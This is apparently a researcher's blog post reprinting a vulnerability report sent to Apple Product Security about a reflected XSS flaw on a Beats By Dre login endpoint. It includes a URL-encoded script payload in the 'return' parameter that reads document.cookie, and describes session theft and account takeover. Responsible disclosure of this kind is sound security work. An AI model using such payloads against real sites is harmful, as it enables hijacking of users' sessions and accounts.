[Vulnerability Report] Non-Persistent XSS on Beats By Dre

---------Following is the email which i had sent to Apple Product Security----------

Vulnerability type: Non-Persistent XSS

Affected URL: https://tempo.api.beatsbydre.com/v1/login/?return=%22%3E%3C/form%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Attack Scenario: An attacker is able to trick an authenticated user into visiting a malicious URL,
which is capable of stealing user's session and take over his apple account.

Best Regards
 Amit Kumar
cse@engineer.com
-------------------------------------------------------------------------------------------------------------------------

Preview:
 
 

Amit Sangra

Author & Editor

Amit is a Security Engineer acknowledged by Google, Apple, Microsoft, eBay, Intel and other top companies for reporting security issues in their web services.

0 comments:

Post a Comment

 
biz.